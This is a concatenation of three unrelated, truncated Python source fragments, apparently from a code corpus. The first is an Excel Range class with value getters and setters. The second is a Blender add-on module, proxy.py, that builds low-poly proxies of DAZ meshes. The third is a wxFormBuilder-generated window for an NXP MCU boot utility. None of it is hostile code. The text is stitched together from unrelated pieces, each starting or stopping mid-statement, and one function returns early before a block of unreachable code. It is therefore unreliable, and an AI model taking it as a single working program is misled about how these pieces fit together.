self.col1 = xlplatform.get_first_column(self.xl_sheet, range_address)
self.row2 = self.row1 + xlplatform.count_rows(self.xl_sheet, range_address) - 1
self.col2 = self.col1 + xlplatform.count_columns(self.xl_sheet, range_address) - 1
self.xl_range = xlplatform.get_range_from_indices(self.xl_sheet, self.row1, self.col1, self.row2, self.col2)
# Iterator object that returns cell coordinates: (1, 1), (1, 2) etc.
self.cell_iterator = itertools.product(xrange(self.row1, self.row2 + 1), xrange(self.col1, self.col2 + 1))
def __iter__(self):
return self
def __next__(self):
# StopIteration raised by itertools.product
return Range(xlplatform.get_worksheet_name(self.xl_sheet), next(self.cell_iterator), **self.kwargs)
# PY2 compatibility
next = __next__
def is_cell(self):
"""
.. versionadded:: 0.1.1
Returns ``True`` if the Range consists of a single Cell otherwise ``False``.
"""
if self.row1 == self.row2 and self.col1 == self.col2:
return True
else:
return False
def is_row(self):
"""
.. versionadded:: 0.1.1
Returns ``True`` if the Range consists of a single Row otherwise ``False``.
"""
if self.row1 == self.row2 and self.col1 != self.col2:
return True
else:
return False
def is_column(self):
"""
.. versionadded:: 0.1.1
Returns ``True`` if the Range consists of a single Column otherwise ``False``.
"""
if self.row1 != self.row2 and self.col1 == self.col2:
return True
else:
return False
def is_table(self):
"""
.. versionadded:: 0.1.1
Returns ``True`` if the Range consists of a 2d array otherwise ``False``.
"""
if self.row1 != self.row2 and self.col1 != self.col2:
return True
else:
return False
@property
def shape(self):
"""
.. versionadded:: 0.3.0
Tuple of Range dimensions.
"""
return self.row2 - self.row1 + 1, self.col2 - self.col1 + 1
@property
def size(self):
"""
.. versionadded:: 0.3.0
Number of elements in the Range.
"""
return self.shape[0] * self.shape[1]
def __len__(self):
return self.row2 - self.row1 + 1
@property
def value(self):
"""
Gets and sets the values for the given Range.
Returns
-------
list or numpy array
Empty cells are set to ``None``. If ``asarray=True``,
a numpy array is returned where empty cells are set to ``nan``.
"""
# TODO: refactor
if self.is_cell():
# Clean_xl_data requires and returns a list of list
data = xlplatform.clean_xl_data([[xlplatform.get_value_from_range(self.xl_range)]])
if not self.atleast_2d:
data = data[0][0]
elif self.is_row():
data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
if not self.atleast_2d:
data = data[0]
elif self.is_column():
data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
if not self.atleast_2d:
data = [item for sublist in data for item in sublist]
else: # 2d Range, leave as list of list
data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
# Return as NumPy Array
if self.asarray:
# replace None (empty cells) with nan as None produces arrays with dtype=object
# TODO: easier like this: np.array(my_list, dtype=np.float)
if data is None:
data = np.nan
if (self.is_column() or self.is_row()) and not self.atleast_2d:
data = [np.nan if x is None else x for x in data]
elif self.is_table() or self.atleast_2d:
data = [[np.nan if x is None else x for x in i] for i in data]
return np.atleast_1d(np.array(data))
return data
@value.setter
def value(self, data):
# Pandas DataFrame: Turn into NumPy object array with or without Index and Headers
if hasattr(pd, 'DataFrame') and isinstance(data, pd.DataFrame):
if self.index:
data = data.reset_index()
if self.header:
if isinstance(data.columns, pd.MultiIndex):
# Ensure dtype=object because otherwise it may get assigned a string type which sometimes makes
# vstacking return a string array. This would cause values to be truncated and we can't easily
# transform np.nan in string form.
# Python 3 requires zip wrapped | |
<filename>proxy.py
# Copyright (c) 2016-2019, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import os
import bpy
from mathutils import Vector
from .error import *
from .tables import *
from .utils import *
if bpy.app.version < (2,80,0):
from .buttons27 import UseAllBool
else:
from .buttons28 import UseAllBool
#-------------------------------------------------------------
# Make proxy
#-------------------------------------------------------------
def makeProxy1(context, iterations):
ob = context.object
bpy.ops.object.duplicate()
pxy = context.object
makeRawProxy(pxy, iterations)
pxy.name = stripName(ob.name) + ("_Lod%d" % iterations)
if bpy.app.version < (2,80,0):
pxy.layers = list(ob.layers)
insertSeams(ob, pxy)
print("Low-poly %s created" % pxy.name)
return pxy
def stripName(string):
if string[-5:] == "_Mesh":
return string[:-5]
elif (len(string) > 4 and
string[-4] == "." and
string[-3:].isdigit()):
return string[:-4]
else:
return string
def makeRawProxy(pxy, iterations):
mod = pxy.modifiers.new("Proxy", 'DECIMATE')
mod.decimate_type = 'UNSUBDIV'
mod.iterations = iterations
bpy.ops.object.modifier_apply(apply_as='DATA', modifier=mod.name)
#-------------------------------------------------------------
# Find polys
#-------------------------------------------------------------
def findHumanAndProxy(context):
hum = pxy = None
for ob in getSceneObjects(context):
if ob.type == 'MESH':
if hum is None:
hum = ob
else:
pxy = ob
if len(pxy.data.vertices) > len(hum.data.vertices):
ob = pxy
pxy = hum
hum = ob
return hum,pxy
def assocPxyHumVerts(hum, pxy):
pxyHumVerts = {}
hverts = [(hv.co, hv.index) for hv in hum.data.vertices]
hverts.sort()
pverts = [(pv.co, pv.index) for pv in pxy.data.vertices]
pverts.sort()
for pco,pvn in pverts:
hco,hvn = hverts[0]
while (pco-hco).length > 1e-4:
hverts = hverts[1:]
hco,hvn = hverts[0]
pxyHumVerts[pvn] = hvn
humPxyVerts = dict([(hvn,None) for hvn in range(len(hum.data.vertices))])
for pvn,hvn in pxyHumVerts.items():
humPxyVerts[hvn] = pvn
return pxyHumVerts, humPxyVerts
def findPolys(context):
hum,pxy = findHumanAndProxy(context)
print(hum, pxy)
humFaceVerts,humVertFaces = getVertFaces(hum)
pxyFaceVerts,pxyVertFaces = getVertFaces(pxy)
pxyHumVerts,humPxyVerts = assocPxyHumVerts(hum, pxy)
print("PxyHumVerts", len(pxyHumVerts), len(humPxyVerts))
pvn = len(pxy.data.vertices)
pen = len(pxy.data.edges)
newHumPxyVerts = {}
newPxyEdges = []
for e in hum.data.edges:
if e.use_seam:
hvn1,hvn2 = e.vertices
pvn1 = humPxyVerts[hvn1]
pvn2 = humPxyVerts[hvn2]
useAdd = False
if pvn1 is None or pvn2 is None:
if hvn1 in newHumPxyVerts.keys():
pvn1 = newHumPxyVerts[hvn1]
else:
pvn1 = newHumPxyVerts[hvn1] = pvn
pvn += 1
if hvn2 in newHumPxyVerts.keys():
pvn2 = newHumPxyVerts[hvn2]
else:
pvn2 = newHumPxyVerts[hvn2] = pvn
pvn += 1
newPxyEdges.append((pen, pvn1, pvn2))
pen += 1
newVerts = [(pvn,hvn) for hvn,pvn in newHumPxyVerts.items()]
newVerts.sort()
setActiveObject(context, pxy)
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.select_mode(type='EDGE')
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.mark_seam(clear=True)
bpy.ops.mesh.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='OBJECT')
print("BEF", len(pxy.data.vertices), len(pxy.data.edges))
pxy.data.vertices.add(len(newVerts))
for pvn,hvn in newVerts:
pv = pxy.data.vertices[pvn]
pv.co = hum.data.vertices[hvn].co.copy()
#print(pv.index,pv.co)
pxy.data.edges.add(len(newPxyEdges))
for pen,pvn1,pvn2 in newPxyEdges:
pe = pxy.data.edges[pen]
pe.vertices = (pvn1,pvn2)
pe.select = True
#print(pe.index, list(pe.vertices), pe.use_seam)
print("AFT", len(pxy.data.vertices), len(pxy.data.edges))
return
pxyHumFaces = {}
for pfn,pfverts in enumerate(pxyFaceVerts):
cands = []
for pvn in pfverts:
hvn = pxyHumVerts[pvn]
for hfn in humVertFaces[hvn]:
cands.append(hfn)
print(pfn, cands)
if len(cands) == 16:
vcount = {}
for hfn in cands:
for hvn in humFaceVerts[hfn]:
if hvn not in vcount.keys():
vcount[hvn] = []
vcount[hvn].append(hfn)
vlist = [(len(hfns),hvn,hfns) for hvn,hfns in vcount.items()]
vlist.sort()
print(vlist)
pxyHumFaces[pfn] = vlist[-1]
print("RES", pfn, pxyHumFaces[pfn])
for hfn in vlist[-1][2]:
hf = hum.data.polygons[hfn]
hf.select = True
class DAZ_OT_FindPolys(bpy.types.Operator):
bl_idname = "daz.find_polys"
bl_label = "Find Polys"
bl_options = {'UNDO'}
@classmethod
def poll(self, context):
return context.object
def execute(self, context):
checkObjectMode(context)
try:
findPolys(context)
except DazError:
handleDazError(context)
return {'FINISHED'}
#-------------------------------------------------------------
# Make faithful proxy
#-------------------------------------------------------------
class Proxifier:
def __init__(self, ob):
self.object = ob
self.nfaces = len(ob.data.polygons)
self.nverts = len(ob.data.vertices)
self.faceverts = None
self.vertfaces = None
self.neighbors = None
self.seams = None
self.faces = []
self.matOffset = 10
self.origMnums = {}
self.colorOnly = False
def remains(self):
free = [t for t in self.dirty.values() if not t]
return len(free)
def setup(self, ob, context):
self.faceverts, self.vertfaces, self.neighbors, self.seams = findSeams(ob)
if self.colorOnly:
self.createMaterials()
self.origMnums = {}
for f in ob.data.polygons:
self.origMnums[f.index] = f.material_index
if self.colorOnly:
f.material_index = 0
deselectEverything(ob, context)
self.dirty = dict([(fn,False) for fn in range(self.nfaces)])
for f in ob.data.polygons:
if f.hide:
self.dirty[f.index] = True
newfaces = [[fn] for fn in range(self.nfaces) if self.dirty[fn]]
printStatistics(ob)
return newfaces
def getConnectedComponents(self):
self.clusters = dict([(fn,-1) for fn in range(self.nfaces)])
self.refs = dict([(fn,fn) for fn in range(self.nfaces)])
cnum = 0
for fn in range(self.nfaces):
cnums = []
for fn2 in self.neighbors[fn]:
cn = self.clusters[fn2]
if cn >= 0:
cnums.append(self.deref(cn))
cnums.sort()
if cnums:
self.clusters[fn] = cn0 = cnums[0]
for cn in cnums[1:]:
self.refs[cn] = cn0
else:
self.clusters[fn] = cn0 = cnum
cnum += 1
comps = dict([(cn,[]) for cn in range(cnum)])
taken = dict([(cn,False) for cn in range(cnum)])
for fn in range(self.nfaces):
cn = self.clusters[fn]
cn = self.deref(cn)
comps[cn].append(fn)
self.clusters[fn] = cn
return comps,taken
def deref(self, cn):
cnums = []
while self.refs[cn] != cn:
cnums.append(cn)
cn = self.refs[cn]
for cn1 in cnums:
self.refs[cn1] = cn
return cn
def getNodes(self):
nodes = []
comps,taken = self.getConnectedComponents()
for vn in range(self.nverts):
fnums = self.vertfaces[vn]
if len(fnums) not in [0,2,4]:
for fn in fnums:
if not self.dirty[fn]:
nodes.append(fn)
taken[self.clusters[fn]] = True
for cn,comp in comps.items():
if len(comp) > 0 and not taken[cn]:
nodes.append(comp[0])
return set(nodes)
def make(self, ob, context):
newfaces = self.setup(ob, context)
remains1 = self.remains()
print("Step 0 Remains:", remains1)
nodes = self.getNodes()
for fn in nodes:
self.dirty[fn] = True
for fn in nodes:
self.mergeFaces(fn, newfaces)
prevblock = newfaces
step = 1
remains2 = self.remains()
while remains2 and remains2 < remains1 and step < 50:
print("Step %d Remains:" % step, self.remains())
block = []
for newface in prevblock:
self.mergeNextFaces(newface, block)
newfaces += block
prevblock = block
step += 1
remains1 = remains2
remains2 = self.remains()
print("Step %d Remains:" % step, self.remains())
if self.colorOnly:
self.combineFaces(newfaces)
return
else:
self.buildNewMesh(newfaces)
deleteMidpoints(ob)
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.remove_doubles()
bpy.ops.object.mode_set(mode='OBJECT')
printStatistics(ob)
def makeQuads(self, ob, context):
newfaces = self.setup(ob, context)
for fn1 in range(self.nfaces):
if self.dirty[fn1]:
continue
if len(self.faceverts[fn1]) == 3:
for fn2 in self.neighbors[fn1]:
if (len(self.faceverts[fn2]) == 3 and
not self.dirty[fn2] and
fn2 not in self.seams[fn1]):
self.dirty[fn1] = True
self.dirty[fn2] = True
newface = [fn1,fn2]
newfaces.append(newface)
break
if self.colorOnly:
self.combineFaces(newfaces)
return
else:
self.buildNewMesh(newfaces)
printStatistics(ob)
def buildNewMesh(self, newfaces):
from .geometry import makeNewUvloop
free = [[fn] for fn,t in self.dirty.items() if not t]
newfaces += free
ob = self.object
uvtex,uvloop,uvdata = getUvData(ob)
self.vertmap = dict([(vn,-1) for vn in range(self.nverts)])
self.verts = []
self.lastvert = 0
faces = []
uvfaces = []
mats = list(ob.data.materials)
mnums = []
n = 0
for newface in newfaces:
taken = self.findTaken(newface)
n = 0
fn1 = newface[n]
fverts = self.faceverts[fn1]
idx = 0
vn = fverts[idx]
while self.changeFace(vn, fn1, newface) >= 0:
idx += 1
if idx == len(fverts):
n += 1
if n == len(newface):
for fn in newface:
print(fn, self.faceverts[fn])
raise RuntimeError("BUG")
fn1 = newface[n]
fverts = self.faceverts[fn1]
idx = 0
vn = fverts[idx]
face = [self.getVert(vn)]
uvface = [uvdata[fn1][idx]]
mnums.append(self.origMnums[fn1])
taken[vn] = True
done = False
while not done:
fn2 = self.changeFace(vn, fn1, newface)
if fn2 >= 0:
fn1 = fn2
fverts = self.faceverts[fn2]
idx = getIndex(vn, fverts)
idx = (idx+1)%len(fverts)
vn = fverts[idx]
if taken[vn]:
done = True
else:
face.append(self.getVert(vn))
uvface.append(uvdata[fn1][idx])
taken[vn] = True
if len(face) >= 3:
faces.append(face)
uvfaces.append(uvface)
else:
print("Non-face:", face)
me = bpy.data.meshes.new("New")
me.from_pydata(self.verts, [], faces)
uvloop = | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Oct 26 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
###########################################################################
## Class secBootWin
###########################################################################
class secBootWin ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"NXP MCU Boot Utility", pos = wx.DefaultPosition, size = wx.Size( 1122,730 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_menubar = wx.MenuBar( 0 )
self.m_menu_file = wx.Menu()
self.m_menuItem_exit = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_exit )
self.m_menubar.Append( self.m_menu_file, u"File" )
self.m_menu_edit = wx.Menu()
self.m_menubar.Append( self.m_menu_edit, u"Edit" )
self.m_menu_view = wx.Menu()
self.m_menu_language = wx.Menu()
self.m_menuItem_english = wx.MenuItem( self.m_menu_language, wx.ID_ANY, u"EN - English", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_language.Append( self.m_menuItem_english )
self.m_menuItem_chinese = wx.MenuItem( self.m_menu_language, wx.ID_ANY, u"ZH - 简体中文", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_language.Append( self.m_menuItem_chinese )
self.m_menu_view.AppendSubMenu( self.m_menu_language, u"Language/语言" )
self.m_menubar.Append( self.m_menu_view, u"View" )
self.m_menu_tools = wx.Menu()
self.m_menu_runMode = wx.Menu()
self.m_menuItem_runModeEntry = wx.MenuItem( self.m_menu_runMode, wx.ID_ANY, u"Entry", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_runMode.Append( self.m_menuItem_runModeEntry )
self.m_menuItem_runModeMaster = wx.MenuItem( self.m_menu_runMode, wx.ID_ANY, u"Master", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_runMode.Append( self.m_menuItem_runModeMaster )
self.m_menu_tools.AppendSubMenu( self.m_menu_runMode, u"Run Mode" )
self.m_menu_usbDetection = wx.Menu()
self.m_menuItem_usbDetectionDynamic = wx.MenuItem( self.m_menu_usbDetection, wx.ID_ANY, u"Dynamic", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_usbDetection.Append( self.m_menuItem_usbDetectionDynamic )
self.m_menuItem_usbDetectionStatic = wx.MenuItem( self.m_menu_usbDetection, wx.ID_ANY, u"Static", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_usbDetection.Append( self.m_menuItem_usbDetectionStatic )
self.m_menu_tools.AppendSubMenu( self.m_menu_usbDetection, u"USB Detection" )
self.m_menu_soundEffect = wx.Menu()
self.m_menuItem_soundEffectContra = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Contra", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectContra )
self.m_menuItem_soundEffectMario = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Mario", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectMario )
self.m_menuItem_soundEffectQuiet = wx.MenuItem( self.m_menu_soundEffect, wx.ID_ANY, u"Quiet", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_soundEffect.Append( self.m_menuItem_soundEffectQuiet )
self.m_menu_tools.AppendSubMenu( self.m_menu_soundEffect, u"Sound Effect" )
self.m_menu_genSbFile = wx.Menu()
self.m_menuItem_genSbFileYes = wx.MenuItem( self.m_menu_genSbFile, wx.ID_ANY, u"Yes", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_genSbFile.Append( self.m_menuItem_genSbFileYes )
self.m_menuItem_genSbFileNo = wx.MenuItem( self.m_menu_genSbFile, wx.ID_ANY, u"No", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_genSbFile.Append( self.m_menuItem_genSbFileNo )
self.m_menu_tools.AppendSubMenu( self.m_menu_genSbFile, u"Generate .sb file" )
self.m_menu_imageReadback = wx.Menu()
self.m_menuItem_imageReadbackAutomatic = wx.MenuItem( self.m_menu_imageReadback, wx.ID_ANY, u"Automatic", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_imageReadback.Append( self.m_menuItem_imageReadbackAutomatic )
self.m_menuItem_imageReadbackManual = wx.MenuItem( self.m_menu_imageReadback, wx.ID_ANY, u"Manual", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_imageReadback.Append( self.m_menuItem_imageReadbackManual )
self.m_menu_tools.AppendSubMenu( self.m_menu_imageReadback, u"Image Readback" )
self.m_menu_flashloaderResident = wx.Menu()
self.m_menuItem_flashloaderResidentDefault = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"Default", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentDefault )
self.m_menuItem_flashloaderResidentItcm = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"ITCM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentItcm )
self.m_menuItem_flashloaderResidentDtcm = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"DTCM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentDtcm )
self.m_menuItem_flashloaderResidentOcram = wx.MenuItem( self.m_menu_flashloaderResident, wx.ID_ANY, u"OCRAM", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flashloaderResident.Append( self.m_menuItem_flashloaderResidentOcram )
self.m_menu_tools.AppendSubMenu( self.m_menu_flashloaderResident, u"Flashloader Resident" )
self.m_menu_efuseGroup = wx.Menu()
self.m_menuItem_efuseGroup0 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"0", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup0 )
self.m_menuItem_efuseGroup1 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"1", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup1 )
self.m_menuItem_efuseGroup2 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"2", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup2 )
self.m_menuItem_efuseGroup3 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"3", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup3 )
self.m_menuItem_efuseGroup4 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"4", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup4 )
self.m_menuItem_efuseGroup5 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"5", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup5 )
self.m_menuItem_efuseGroup6 = wx.MenuItem( self.m_menu_efuseGroup, wx.ID_ANY, u"6", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_efuseGroup.Append( self.m_menuItem_efuseGroup6 )
self.m_menu_tools.AppendSubMenu( self.m_menu_efuseGroup, u"eFuse Group" )
self.m_menu_flexspiXipRegion = wx.Menu()
self.m_menuItem_flexspiXipRegion0 = wx.MenuItem( self.m_menu_flexspiXipRegion, wx.ID_ANY, u"0", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flexspiXipRegion.Append( self.m_menuItem_flexspiXipRegion0 )
self.m_menuItem_flexspiXipRegion1 = wx.MenuItem( self.m_menu_flexspiXipRegion, wx.ID_ANY, u"1", wx.EmptyString, wx.ITEM_RADIO )
self.m_menu_flexspiXipRegion.Append( self.m_menuItem_flexspiXipRegion1 )
self.m_menu_tools.AppendSubMenu( self.m_menu_flexspiXipRegion, u"FlexSPI XIP Region" )
self.m_menubar.Append( self.m_menu_tools, u"Tools" )
self.m_menu_window = wx.Menu()
self.m_menubar.Append( self.m_menu_window, u"Window" )
self.m_menu_help = wx.Menu()
self.m_menuItem_homePage = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Home Page", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_homePage )
self.m_menuItem_aboutAuthor = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"About Author", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_aboutAuthor )
self.m_menuItem_contributors = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Contributors", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_contributors )
self.m_menuItem_specialThanks = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Special Thanks", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_specialThanks )
self.m_menuItem_revisionHistory = wx.MenuItem( self.m_menu_help, wx.ID_ANY, u"Revision History", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_help.Append( self.m_menuItem_revisionHistory )
self.m_menubar.Append( self.m_menu_help, u"Help" )
self.SetMenuBar( self.m_menubar )
bSizer_win = wx.BoxSizer( wx.VERTICAL )
wSizer_func = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
bSizer_setup = wx.BoxSizer( wx.VERTICAL )
self.m_notebook_targetSetup = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), 0 )
self.m_panel_targetSetup = wx.Panel( self.m_notebook_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel_targetSetup.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
wSizer_targetSetup = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_mcuSeries = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"MCU Series:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_mcuSeries.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_mcuSeries, 0, wx.ALL, 5 )
m_choice_mcuSeriesChoices = [ u"i.MXRT", u"LPC", u"Kinetis" ]
self.m_choice_mcuSeries = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_mcuSeriesChoices, 0 )
self.m_choice_mcuSeries.SetSelection( 0 )
wSizer_targetSetup.Add( self.m_choice_mcuSeries, 0, wx.ALL, 5 )
self.m_staticText_mcuDevice = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"MCU Device:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_mcuDevice.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_mcuDevice, 0, wx.ALL, 5 )
m_choice_mcuDeviceChoices = [ u"i.MXRT1015", u"i.MXRT102x", u"i.MXRT105x", u"i.MXRT106x", u"i.MXRT1064 SIP" ]
self.m_choice_mcuDevice = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_mcuDeviceChoices, 0 )
self.m_choice_mcuDevice.SetSelection( 2 )
wSizer_targetSetup.Add( self.m_choice_mcuDevice, 0, wx.ALL, 5 )
self.m_staticText_bootDevice = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, u"Boot Device:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_bootDevice.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_bootDevice, 0, wx.ALL, 5 )
m_choice_bootDeviceChoices = [ u"FLEXSPI NOR", u"FLEXSPI NAND", u"SEMC NOR", u"SEMC NAND", u"uSDHC SD", u"uSDHC MMC/eMMC", u"LPSPI NOR/EEPROM" ]
self.m_choice_bootDevice = wx.Choice( self.m_panel_targetSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_bootDeviceChoices, 0 )
self.m_choice_bootDevice.SetSelection( 0 )
wSizer_targetSetup.Add( self.m_choice_bootDevice, 0, wx.ALL, 5 )
self.m_staticText_null1TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 256,5 ), 0 )
self.m_staticText_null1TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null1TargetSetup, 0, wx.ALL, 5 )
self.m_staticText_null2TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 20,-1 ), 0 )
self.m_staticText_null2TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null2TargetSetup, 0, wx.ALL, 5 )
self.m_button_bootDeviceConfiguration = wx.Button( self.m_panel_targetSetup, wx.ID_ANY, u"Boot Device Configuration", wx.DefaultPosition, wx.Size( 200,-1 ), 0 )
wSizer_targetSetup.Add( self.m_button_bootDeviceConfiguration, 0, wx.ALL, 5 )
self.m_staticText_null3TargetSetup = wx.StaticText( self.m_panel_targetSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 20,-1 ), 0 )
self.m_staticText_null3TargetSetup.Wrap( -1 )
wSizer_targetSetup.Add( self.m_staticText_null3TargetSetup, 0, wx.ALL, 5 )
self.m_button_deviceConfigurationData = wx.Button( self.m_panel_targetSetup, wx.ID_ANY, u"Device Configuration Data (DCD)", wx.DefaultPosition, wx.Size( 200,-1 ), 0 )
wSizer_targetSetup.Add( self.m_button_deviceConfigurationData, 0, wx.ALL, 5 )
self.m_panel_targetSetup.SetSizer( wSizer_targetSetup )
self.m_panel_targetSetup.Layout()
wSizer_targetSetup.Fit( self.m_panel_targetSetup )
self.m_notebook_targetSetup.AddPage( self.m_panel_targetSetup, u"Target Setup", False )
bSizer_setup.Add( self.m_notebook_targetSetup, 1, wx.EXPAND |wx.ALL, 5 )
self.m_notebook_portSetup = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_panel_portSetup = wx.Panel( self.m_notebook_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
wSizer_portSetup = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_null1PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), 0 )
self.m_staticText_null1PortSetup.Wrap( -1 )
